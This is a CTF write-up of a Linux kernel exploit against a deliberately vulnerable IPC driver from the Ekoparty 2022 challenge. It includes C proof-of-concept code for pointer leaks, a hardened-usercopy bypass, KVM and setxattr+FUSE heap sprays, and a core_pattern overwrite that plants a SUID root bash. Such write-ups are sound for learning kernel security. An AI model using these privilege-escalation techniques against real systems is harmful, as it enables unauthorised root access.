BFS Ekoparty 2022 Kernel exploitation challenge write-up

Last month Blue Frost Security published two exploitation challenges for Ekoparty 2022. One of them was a Linux kernel challenge. I don’t have much experience with Linux kernel exploitation, so this was a good opportunity to practise. I also write this up as a reference for my future self.

Let’s start!

Setup

We are given the source code of a Linux Kernel Module. We are told it’s an IPC driver, and we are asked to load it on an Ubuntu 22.04 VM with latest kernel (5.15.0-52-generic) and get root by exploiting it.

For the virtual machine, I will be using Vagrant with VirtualBox. In order to create a virtual machine, first we need to setup a Vagrantfile. This can be done with vagrant init ubuntu/focal64. Then, we can edit it and add the line config.vm.synced_folder ".", "/vagrant" to mount the host current directory on /vagrant in the guest. Finally, we can create the VM with vagrant up, connect to it with vagrant ssh, and shut it down with vagrant halt. Once we are connected, we can build the module with make, load it with sudo insmod blunder.ko, and give access permissions to the file with sudo chmod 666 /dev/blunder. This gives us a fast iteration cycle of building the exploiting, testing it, and resetting the VM in case it crashes (which in my case happened a lot).

Analysis

The driver

The driver implements an IPC mecanism for sending messages from one process to another. The idea is that each process opens the file /dev/blunder, creates a buffer with mmap, and then one sends a message with the ioctl IOCTL_BLUNDER_SEND_MSG while the other receives it with IOCTL_BLUNDER_RECV_MSG.

The interesting thing is that the mmap handler calls kmalloc and maps the result to the virtual memory area, so it is backed up by kernel heap and is accessible from both kernel and userspace. The driver uses that mapping to store the metadata of buffers and the contents of the messages received, so when a message is sent to a process it is directly copied to its mapping. Then, when the process attempts to receive it, the kernel simply returns a pointer to that mapping where the message has been already copied. Having that mapping shared by both kernel and user allows to avoid an extra copy of the message, since it is directly copied from one process to another.

Finally, in addition to data, messages can also include file descriptors which will be copied from one process to another.

Later on I was told this driver was inspired by Binder, an Android driver which implements a similar IPC mechanism.

Structures

The global state of the driver keeps the processes that are using the device in a rb-tree ordered by pid, and a pointer to one of them as a context manager, which doesn’t seem to have much special functionality.

  
struct blunder_device {
	spinlock_t lock;
	struct rb_root procs;
	struct blunder_proc *context_manager;
};

Each process has an associated blunder_proc, which has a blunder_alloc and a list of messages pending to receive.

  
struct blunder_proc {
	struct kref refcount;
	spinlock_t lock;
	int pid;
	int dead;
	struct rb_node rb_node;
	struct blunder_alloc alloc;
	struct list_head messages;
};

The blunder_alloc structure holds a kernel pointer to the mapping (the one returned by kmalloc), its size, the difference between the kernel and user pointers (so user_ptr = mapping - user_buffer_offset), and a list of buffers where messages are saved.

  
struct blunder_alloc {
	spinlock_t lock;
	void *mapping;
	size_t mapping_size;
	ptrdiff_t user_buffer_offset;
	struct list_head buffers;
};

Buffers are described by blunder_buffer. Every buffer is stored in the mapping that is shared by both kernel and user, and the metadata includes whether it’s free or not, its size, and the size of its data in case it’s not free. offsets_size is an unimplemented feature and remains 0. This structure is followed by the actual data.

  
struct blunder_buffer {
	struct list_head buffers_node;
	atomic_t free;
	size_t buffer_size;
	size_t data_size;
	size_t offsets_size;
	unsigned char data[0];
};

Buffers are held in a linked list. First, when the user performs the mapping, the whole area is set a single buffer. Then, each time a message is stored in a buffer and the remaining size is large enough, the buffer is splitted and the remaining space is used to create a new buffer that is added to the linked list.

Finally, messages are described by bundler_message. It has a pointer to the sender (although actually it’s the pid that it’s stored there), a pointer to the buffer where the data is stored, and an array of struct file*s that must be installed on the receiving end.

  
struct blunder_message {
	struct list_head entry;
	int opcode;
	struct blunder_proc *from;
	struct blunder_buffer *buffer;
	size_t num_files;
	struct file **files;
};

On the user side, the user must hand the following data to send a message, with the offsets stuff being unimplemented.

  
struct blunder_user_message {
	int handle;
	int opcode;
	void *data;
	size_t data_size;
	size_t *offsets;
	size_t offsets_size;
	int *fds;
	size_t num_fds;
};

Vulnerabilities

As you may have noticed with the analysis above, there is one serious issue with the design. The mapping, which is shared by user and kernel, contains blunder_buffers that have kernel pointers and other metadata. This supposes an infoleak. Unfortunately, the driver doesn’t allow us to map as writable:

  
/* Bail out if mapping is too large or writable */
if (sz > BLUNDER_MAX_MAP_SIZE || vma->vm_flags & VM_WRITE) {
    goto out;
}

However, the mmap handler doesn’t remove the VM_MAYWRITE flag from vma->vm_flags, which is set by default if you open the device file with write permissions. This means we can map as read-only, and then change it to writable with mprotect, allowing us to modify the blunder_buffers.

In fact, BFS published a hint that pointed to these vulnerabilities. It looks like Binder had the same design issue of storing the metadata in the shared mapping, although they were clever enough to clear the VM_MAYWRITE flag.

So what have we got? Recall we have full control of blunder_buffer structs, because they are mapped in userspace. Regarding leaks, blunder_buffers are linked together with the usual list_head. If we have two of them, the next pointer of the first one will point to the second one, leaking the kernel address of the mapping. Assuming we are mapping one page, this belongs to kmalloc-4k. In addition, the prev pointer will point to the head of the list, which is stored in blunder_proc. Since its size is 104 bytes, it will be in kmalloc-128.

On the other hand, modifying the buffer metadata may give us some juicy primitives. For example, modifying its size may allow us to send a message bigger than the available size, resulting in a heap overflow with controlled data.

Let’s write a simple POC. Code snippets won’t include error handling for brevity. First, let’s check if the leak works:

  
int g_fd;
void* g_p;

void dump(const void* p, size_t size) {
	const uint64_t* p_u64 = (const uint64_t*)p;
	for (size_t i = 0; i < size/8; i++) {
		printf("%016lx ", p_u64[i]);
	}
	printf("\n");
}

int send_blunder_message(void* data, size_t data_size, int* fds, size_t num_fds) {
	// Send a message to ourselves
	struct blunder_user_message umsg = {
		.handle = getpid(),
		.data = data,
		.data_size = data_size,
		.fds = fds,
		.num_fds = num_fds,
	};
	return ioctl(g_fd, IOCTL_BLUNDER_SEND_MSG, &umsg);
}

int main() {
	g_fd = open("/dev/blunder", O_RDWR);
	g_p = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, g_fd, 0);

	char data[0x10];
	send_blunder_message(data, sizeof(data), NULL, 0);
	dump(g_p, 0x60);
}

  
vagrant@ubuntu-jammy:/vagrant$ ./poc
ffff9272c50fb040 ffff9272c3a5fd48 0000000000000000 0000000000000010 0000000000000010 0000000000000000
0000000000000000 0000000000000000 ffff9272c3a5fd48 ffff9272c50fb000 0000000000000001 0000000000000f90

When we send a message, the first blunder_buffer is splitted. Here we are leaking the linked list pointers of both buffers. The first pointer points to the second buffer, the last one points to the first one, and the two others point to the list head in blunder_proc. Now, let’s try to modify the buffer and do an overflow. For example, we could set the first buffer at the beginning of the mapping as free, and change its size to 0x2000.

  
[...]

mprotect(g_p, 0x1000, PROT_READ|PROT_WRITE);
struct blunder_buffer* buf = g_p;
buf->free = 1;
buf->buffer_size = 0x2000;

char* too_big_data = malloc(0x2000);
send_blunder_message(too_big_data, 0x2000, NULL, 0);

  
vagrant@ubuntu-jammy:/vagrant$ ./test
[...]
Segmentation fault

Hmm? Did I fail at coding C once more? Let’s take a look at dmesg:

  
vagrant@ubuntu-jammy:/vagrant$ sudo dmesg
[...]
[ 135.345109] usercopy: Kernel memory overwrite attempt detected to SLUB object
'kmalloc-4k' (offset 48, size 8192)!
[ 135.349562] ------------[ cut here ]------------
[ 135.351382] kernel BUG at mm/usercopy.c:99!
[ 135.353388] invalid opcode: 0000 [#2] SMP PTI
[ 135.355096] CPU: 0 PID: 1366 Comm: test Tainted: G      D    OE     5.15.0-53
[ 135.357718] Hardware name: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBo
[ 135.360335] RIP: 0010:usercopy_abort+0x7b/0x7d
[...]
[ 135.383391] Call Trace:
[ 135.384114]  <TASK>
[ 135.384785]  __check_heap_object+0x174/0x1b0
[ 135.385673]  __check_object_size.part.0+0x134/0x150
[ 135.386618]  __check_object_size+0x1d/0x30
[ 135.387477]  blunder_ioctl+0x238/0x3e0 [blunder]

It looks like modern kernels have a mitigation called hardened usercopy, which checks that “what is being copied fits within the size of the object allocated” when calling copy_to_user and copy_from_user. Since we are attempting to write 8192 bytes to a kmalloc-4k object, the check fails. This effectively kills heap overflow from one object to another. Isn’t there anything we can do?

Turns out, there is. We can bypass this mitigation if we write directly to the object next to ours, meaning the dest argument of copy_from_user must point to the target object. We can get this by creating a fake blunder_buffer exactly at the end of our mapping, so its data starts at the beginning of the next object. Then, we can link it to our list of buffers by modifying the first blunder_buffer in the mapping. In order to do so, we’ll need to get its kernel address from the leak. Let’s try it!

  
[...]
// Get mapping address
struct blunder_buffer* buf = g_p;
uint64_t mapping_addr = (uint64_t)buf->buffers_node.next - 0x40;

// Create fake buffer
struct blunder_buffer* fake_buf = g_p + 0x1000 - sizeof(struct blunder_buffer);
fake_buf->free = 1;
fake_buf->buffer_size = 0x1000;

// Link it after our first buffer
buf->buffers_node.next = mapping_addr + 0x1000 - sizeof(struct blunder_buffer);

char* too_big_data = malloc(0x1000);
send_blunder_message_nocheck(too_big_data, 0x1000, NULL, 0);

Running this crashes the vm, which means we are successfully overflowing into some object and bypassing the mitigation!

Exploitation

First primitives

Before looking for some target object to overwrite, let’s consider the powerful spray primitive we have. When we open the device, a blunder_proc is allocated in kmalloc-128. Then, when we mmap a page for the device, it is allocated in kmalloc-4k. Because of the leaks discussed earlier, we are able to obtain the address of both objects. This leads to the following strategy:

Allocate a bunch of mappings in kmalloc-4k.
Get their kernel addresses and look for two of them that are adjacent.
Free the second one and reallocate it with a target object.
Trigger the overflow on the first one to overwrite the target object.

Since each process can only open and map the device once, this will require forking and some IPC mechanism.

Now, when looking for target objects I usually refer to this post by ptr-yudai. Our heap overflow is in kmalloc-4k, and the only object listed there that would fit that size is msg_msg. I have been reading some posts about kernel exploiting abusing that object (link, link), so I was excited to try that technique. However, I wasn’t able to trigger the reallocation correctly. Then I realised that msg_msg is allocated with the flag GFP_KERNEL_ACCOUNT (here), so it is stored in kmalloc-cg-4k instead of kmalloc-4k. I knew cross-cache overflows were a thing (link), but I didn’t feel confident enough to try that out.

Then, I started to think about overwriting the blunder_proc. It belongs to kmalloc-128, but we know its address. Therefore, similarly to the previous strategy, we could:

Allocate two adjacent blunder_procs.
Free the first one, do some heap spray and reallocate it with a fake blunder_buffer whose data will start at the beginning of the second blunder_proc.
Link that buffer to our linked list.
Send a message that will be stored in the fake blunder_buffer and will overwrite the second blunder_proc.

Note that we could also have freed the second blunder_proc and replaced it with some other target object. However, the only target object for kmalloc-128 that the post mentions is subprocess_info, which now belongs to kmalloc-96. So let’s stick to blunder_proc for now.

What primitives do we get when overwriting blunder_proc? If we remember, it has a blunder_alloc embedded in it, which has a kernel pointer to the mapping. When the blunder_proc is freed, that mapping is also freed. Hence, if we overwrite that pointer, we can get an arbitrary free primitive. However, at the time I didn’t think of any suitable target object, and didn’t follow that path. More on this path here.

I was looking for some read primitive that would allow me to leak the kernel base. I found it with the blunder_message struct. blunder_proc has a list of messages that have been sent to the process and copied to its mapping, and that are pending to receive with IOCTL_BLUNDER_RECV_MSG. The idea is to link a fake blunder_message to that list. We can create the fake message in the shared mapping, and as we know its address, we’ll be able to link it when overwriting the blundre_proc. Then, when receiving that message, the driver will do:

  
    umsg.data_size = msg->buffer->data_size;

This dereferences the buffer pointer of the fake message and returns us its value. Therefore, creating a fake message with an appropiate buffer pointer we can have an arbitrary read primitive. The message is removed from the list when received. In order to repeat the primitive, we have to use IOCTL_BLUNDER_FREE_BUF with the fake blunder_buffer to mark it as free, and repeat the overflow to link the message again. Note that there is no more heap spray required: once we successfully reallocate with the fake blunder_buffer, we are done.

One issue I faced trying to implement this is the following. We need to spawn multiple processes in order to allocate serveral blunder_procs, which are held in a rb-tree. When overwriting the target blunder_proc, I was corrupting its rb_node field. Then, when any of the other processes finished and the device was closed, the driver tried to erase the corresponding blunder_proc from the rb-tree, crashing the VM. To solve this, I had to dig a bit into rb-trees. Turns out each rb_node has a pointer to its left and right child, and a field __rb_parent_color, which holds both a pointer to the parent and the color of the node (the LSB bit is used for the color, and the rest for the pointer). The solution was to wait for every other process to finish, so our blunder_proc becomes the root of the rb-tree. Then, the state of its rb_node is simple and we can correctly set it when overwriting it: every pointer is NULL, and its color is black (according to this).

Heap spray

Regarding the heap spray, I didn’t know what to use in order to reallocate the first blunder_proc with a fake blunder_buffer. I wanted some object with controlled user data and live time which would fit in kmalloc-128. I had read about using setxattr with FUSE as a replacement for userfaultfd, but I wanted to do some research. Looking at references to memdup_user I found this, which is triggered with the KVM ioctl KVM_X86_SET_MSR_FILTER and allows spraying objects with controlled data and live time of size up to 1536 bytes. It can be used as follows:

  
#define N_VMS 100
#define SPRAY_SIZE 128

void display_slab_info(const char* msg) {
	printf("[%s]\n", msg);
	system("bash -c \"sudo cat /proc/slabinfo | grep '^kmalloc-128'\"");
}

int main() {
	// Setup VMs
	int vm_fds[N_VMS];
	int kvm_fd = open("/dev/kvm", O_RDWR);
	for (size_t i = 0; i < N_VMS; i++) {
		vm_fds[i] = ioctl_chk(kvm_fd, KVM_CREATE_VM, 0);
	}

	// Setup spray
	void* spray = malloc(SPRAY_SIZE);
	struct kvm_msr_filter filter = {
		.flags = KVM_MSR_FILTER_DEFAULT_DENY,
	};
	for (size_t i = 0; i < KVM_MSR_FILTER_MAX_RANGES; i++) {
		filter.ranges[i] = (struct kvm_msr_filter_range) {
			.flags = KVM_MSR_FILTER_READ,
			.nmsrs = SPRAY_SIZE*8,
			.base = 0,
			.bitmap = spray,
		};
	}

	// Trigger spray
	display_slab_info("before spray");
	for (size_t i = 0; i < N_VMS; i++)
		ioctl_chk(vm_fds[i], KVM_X86_SET_MSR_FILTER, &filter);
	display_slab_info("after spray");
	for (size_t i = 0; i < N_VMS; i++)
		close(vm_fds[i]);
	display_slab_info("after releasing");
}

  
vagrant@ubuntu-jammy:/vagrant$ ./test
[before spray]
kmalloc-128         1440   1856    128   32    1 : tunables    0    0    0 : slabdata     58     58      0
[after spray]
kmalloc-128         2976   2976    128   32    1 : tunables    0    0    0 : slabdata     93     93      0
[after releasing]
kmalloc-128         1570   2048    128   32    1 : tunables    0    0    0 : slabdata     64     64      0

It has several problems though: it is only available for x86, it requires the user to belong to the kvm group, and in case of being inside a vm, it requires nested virtualisation to be enabled. As the last two conditions are not satisfied by the default ubuntu vm, I gave up on this and tried the setxattr + FUSE heap spray.

The idea is to call setxattr(path, name, value, size, 0), where value is a pointer to our spray and size its size. The kernel will call kmalloc(size) and copy our spray to the result here. The problem is that it’s freed at the end of the syscall (here), so we want to block in order to delay this. Previously, userfaultfd could be used. It allowed you to handle page faults in userspace, so if we divided our spray payload in two pages and registered userfaultfd for the second, we could make copy_from_user block when trying to read from the second page, while the first part of the payload has already been copied (link). However. userfaultfd isn’t available anymore.

The solution is to use FUSE as substitute. FUSE (Filesystem in USErspace) allows you to define handlers for some filesystem syscalls such as open, read, write, etc, in userspace. You can read more about it here. Most resources I’ve found (link, link, link) use this in a very similar way to userfaultfd. The idea is again to split our payload in two pages: an anoymous mapping, and a file mapping backed by our filesystem. Then, we can block in the read() handler of our filesystem when copy_from_user reaches the second page.

However, with FUSE you can also define a setxattr handler. So instead on blocking on the read operation on copy_from_user(), I thought it was easier to block directly in the setxattr handler, called from here. I think that’s a bit simpler to implement, because you don’t have to worry about having your payload divided in two pages. In this case, path (the file we call setxattr on) must belong to the filesystem. You can read the full implementation here. I have written it in a separate file so it’s easier for me (and maybe others) to reuse.

KASLR leak

Even when I got an arbitrary read primitive, I still struggled to get the kernel base. I didn’t know any useful object I could leak from kmalloc-128 and kmalloc-4k. Fortunately, blunder_message has an array of struct file*s, which has a pointer to a struct file_operations, which has function pointers that we can leak to get the kernel base.

The idea is to fork and let the child send a message to himself and tell the main process its blunder_proc address, so he can perform the leaks. We can’t do this in the parent, because every time we do the arbitrary read primitive we overwrite its blunder_proc and the message with a struct file* would be lost. In the end, with chained reads we are leaking:

  
child_blunder_proc->messages.next->files[0]->f_op->llseek

Which, when the struct file corresponds to stdin, points to the function no_llseek.

Privilege escalation

Now that we have broken KASLR, how do we get to escalate privileges? Our write primitive is rather weak: we can link a fake blunder_buffer to write somewhere, but it must be valid, that is, have a size lower than BLUNDER_MAX_MAP_SIZE = 0x20000, greater than the amount of data we want to write, and have the field free set to 1. We need the first constraint because we need to specify the buffer size as our message size. Setting it to a lower value would result in the fake buffer being splitted, and crashing when dealing with the linked lists. Since we want to avoid overwriting more than needed due to a too big size, we can place the data at the end of a mapped page followed by an unmapped page. That way, the copy_from_user in blunder_send_message will fail after copying it to the fake blunder_buffer.

So I wrote some code that would check whether an address was suitable to use as a fake blunder_buffer, and started playing with some interesting objects I could overwrite:

  
uint64_t payload_addr = X;
uint64_t target_buf_addr = payload_addr - sizeof(struct blunder_buffer);
uint64_t free_addr = target_buf_addr + offsetof(struct blunder_buffer, free);
uint64_t buffer_size_addr = target_buf_addr + offsetof(struct blunder_buffer, buffer_size);
uint64_t is_free = arb_read(free_addr) & 0xFFFFFFFF;
uint64_t buffer_size = arb_read(buffer_size_addr);
if (buffer_size < 16 || buffer_size > BLUNDER_MAX_MAP_SIZE)
    die("error: buffer_size = %#lx, needed >= 0x10 and <= %#x :(\n", buffer_size, BLUNDER_MAX_MAP_SIZE);
if (is_free == 0)
    die("error: free = 0, needed nonzero :(\n");
printf("blunder_buffer suitable: free=%lx, buffer_size=%lx\n", is_free, buffer_size);

Creds

With a KASLR leak and an arbitrary read primitive, I could calculate the address of init_task, traverse the linked list of tasks until finding mine, and read its cred pointer. I managed to find a suitable place to use as fake buffer, where the buffer size corresponded to the uid of a previous struct cred. That’s when hardened usercopy hit me in the face again:

[ 5885.570967] usercopy: Kernel memory overwrite attempt detected to SLUB object 'cred_jar' (offset 56, size 1000)!
[ 5885.573638] ------------[ cut here ]------------
[ 5885.573641] kernel BUG at mm/usercopy.c:99!
[...]

The copy_from_user was pointing to the previous struct cred in memory, so it was caught by the mitigation. So close yet so far.

modprobe_path

I was surprised when I saw that CONFIG_STATIC_USERMODEHELPER is not set by default on Ubuntu. The idea was to modify modprobe_path. So I tried to check if some data nearby could be used a fake blunder_buffer. But it wasn’t the case. I found a suitable place, but it was a bit far away from our target modprobe_path. In theory this isn’t a problem: because we have an arbitrary read primitive, we can just read everything we’re going to overwrite so we don’t actually modify anything except our target. But the vm was crashing anyways. The reason was probably that when sending a message, appart from storing the data in the buffer, the driver does buf->free = 0 and buf->data_size = umsg.data_size. In our case, this probably overwrote some used pointers or stuff, which lead to a crash. Unlucky!

core_pattern

I was about to consider other options, like the arbitrary free primitive we saw, or cross-cache attacks, when I remembered there was also core_pattern. While the modprobe_path binary is executed when we attempt to execute a file with unknown format, core_pattern is used to execute a binary when a process crashes, with the intention of producing a core file. This time, I found a suitable address to use as a fake blunder_buffer very close, and it didn’t seem to overwrite anything important. So we can overwrite core_pattern with |/tmp/x, which is a script that will copy bash, make root its owner, and activate the SUID bit. Then, we only have to crash a process for the script to be executed and get a root shell:

  
system("echo '"
           "#!/bin/bash\n"
           "cp /usr/bin/bash /tmp/bash\n"
           "chown root:root /tmp/bash\n"
           "chmod 4755 /tmp/bash"
       "' > /tmp/x");
system("chmod +x /tmp/x");
if (!fork()) {
	*(uint64_t*)0 = 0;
}
wait(NULL);
system("/tmp/bash -p");

Note that in my exploit I had forked previously and I was running on a child process, so running /tmp/bash had to be done from the parent process to keep stdin working.

Full exploit

You can read the full exploit here.

Another exploit strategy

Instead of going down the way of the arbitrary read primitive, we could have used the arbitrary free. I was told this was the path the author followed.

Given the ability to overwrite a blunder_proc as we did here, we can overwrite the mapping pointer, which points to the memory region returned by kmalloc and mapped to the user, with a maximum size of 0x20000. The idea is to make it point to the mapping of another target process. Then, when closing the process with the overwritten blunder_proc, the mapping of the target process will be freed instead. But that target process will still have a stale pointer to its mapping in its blunder_proc, leading to UAF. Not only that, but that mapping is still mapped in userspace. So we have up to 0x20000 bytes of kernel heap mapped in userspace.

One of the ways of exploiting this could be opening /etc/passwd many times to spray struct file objects. Then, we could iterate our mapping, which belongs to kernel heap, looking for one of the files, and add FMODE_WRITE and FMODE_CAN_WRITE to its file->f_mode to get write permissions. This is probably the easiest way to get a root shell, but we could spray other known objects to gain other primitives.

What’s cool about this exploit strategy is that it doesn’t require to break KASLR, so there are no hardcoded offsets that change from kernel to kernel, except maybe the offset of the field f_mode inside struct file, which I believe is unlikely to change much and can be figured out. The exact same exploit would work for every Linux system with the vulnerable driver. On the contrary, my exploit needs the offsets of two symbols to be adjusted: core_pattern and no_llseek. And they do change between versions.

Unintended bugs

I was told there are two unintended bugs that I missed. Let’s take a look at them.

Missing locking

In blunder_alloc_get_buf we are not taking the lock alloc->lock, which could lead to race conditions.

  
struct blunder_buffer *blunder_alloc_get_buf(struct blunder_alloc *alloc,
                                             size_t size)
{
    struct blunder_buffer *buf = NULL;
    struct blunder_buffer *new_buf = NULL;
    list_for_each_entry(buf, &alloc->buffers, buffers_node) {
        if (atomic_read(&buf->free) && buf->buffer_size >= size) { // [1]
            // Is there enough space to split? Then do it!
            uint64_t remaining = buf->buffer_size - size;
            if (remaining > MIN_BUF_SIZE) {
                // Make new buf at the end of this buf
                new_buf = (struct blunder_buffer *)((void *)&buf->data[size]);
                // New buffer size is remaining - header
                new_buf->buffer_size = remaining - sizeof(*new_buf);
                // Adjust old buffer size to size
                buf->buffer_size = size;
                // Mark as free
                atomic_set(&new_buf->free, 1);
                // Add to list after our current entry
                list_add(&new_buf->buffers_node, &buf->buffers_node); // [2]
            }

            // Mark buf as non-free and return it
            atomic_set(&buf->free, 0); // [3]
            return buf;
        }
    }

    // If we got here we're out of mem!
    return NULL;
}

Then, in blunder_send_msg:

  
[...]
buf = blunder_alloc_get_buf(&target->alloc, umsg.data_size + umsg.offsets_size);
if(!buf) {
	ret = -ENOMEM;
	goto release_msg;
}
buf->data_size = umsg.data_size;

[...]

if (copy_from_user(buf->data, umsg.data, umsg.data_size)) { // [4]
	ret = -EFAULT;
	goto release_buf;
}
[...]

For example, this can lead to a single buffer being associated to two different messages sent by two different threads if both threads get to [1] but none of them has marked the buffer as not free in [3] yet. If one of the messages splits the buffer, a new buffer will be created and linked in [2]. If the other message doesn’t split the buffer, its data could overwrite the metadata of new_buf when it is copied in [4].

UAF

When sending a message with file descriptors, in blunder_import_fds the driver calls fget on each of them and stores the resulting struct file* in the blunder_message:

  
static int blunder_import_fds(struct blunder_message *msg, int * __user ufds, int num_fds) {
	[...]
	for(i=0; i < num_fds; i++) {
		msg->files[i] = fget(fds[i]); // [1]
		if (!msg->files[i]) {
			break;
		}
	}
	msg->num_files = i;
	return 0;
}

Then, when receiving the message in blunder_recv_msg:

  
static int blunder_recv_msg(struct blunder_proc *proc, struct blunder_user_message * __user arg) {
	[...]
	for (curr_fd=0; curr_fd < msg->num_files; curr_fd++) {
		fds[curr_fd] = get_unused_fd_flags(O_CLOEXEC); // [2]
		if (fds[curr_fd] < 0) {
			/* Can't make a new fd, return error */
			ret = -ENOSPC;
			goto out_release;
		}
		fd_install(fds[curr_fd], msg->files[curr_fd]);
	}

	[...]
	out_release:
	/* Close the fds we have installed so far */
	if (curr_fd) {
		while(--curr_fd) {
			close_fd(fds[curr_fd]); // [3]
		}
	}

	/* Free the message and buffer */
	blunder_release_msg(proc, msg);
	return ret;
}

  
static void blunder_release_msg(struct blunder_proc *proc, struct blunder_message *msg) {
    int f;
    spin_lock(&proc->lock);
    if (msg->files && msg->num_files) {
        /* Files not transfered to userspace must be released. */
        for (f = 0; f < msg->num_files ; f++) {
            fput(msg->files[f]); // [4]
        }
        kfree(msg->files);
    }
    spin_unlock(&proc->lock);
    kfree(msg);
}

Let’s say two file descriptors are being sent. In [1], we call fget() on each of them, taking a reference. Then, when being received, let’s say the first call to get_unused_fd_flags() in [2] succeeds while the second fails. For the first file, it calls fd_install(fd, file), which basically performs current->files->fdt->fd[fd] = file, i.e., it installs the given file on the file descriptor table of the current process. As its docs says: “callers should treat it as if they had called fput(file)”, because fd_install doesn’t increase the refcount of the file. Then, when the call to get_unused_fd_flags() fails for the second file, we jump to out_release. There, we call close_fd(fd) in [3], which basically sets current->files->fdt->fdt->fd[fd] = NULL and calls fput(file) on the file that was previously there, dropping a reference. Finally, in [4] we call fput(file) on both files.

In the end, for the second file we have taken a reference in [1] and dropped it in [4], but for the first one we have taken a reference in [1] and dropped it in [3] and [4]. The problem is that we are calling fput() on a file that was previously passed to fd_install, despite the docs of fd_install saying that it consumes the refcount of the file.

The primitive described above allows us to decrease by one the reference counter of a file. If we open a file and apply this primitive, the associated struct file will be freed, and we’ll have a dangling pointer in our file descriptor tables, leading to UAF.

Conclusion

I hope you enjoyed and learnt as much as I did, and thanks Blue Frost Security for the challenge. Please don’t hesitate to contact me if you see something wrong, of for any question or clarification.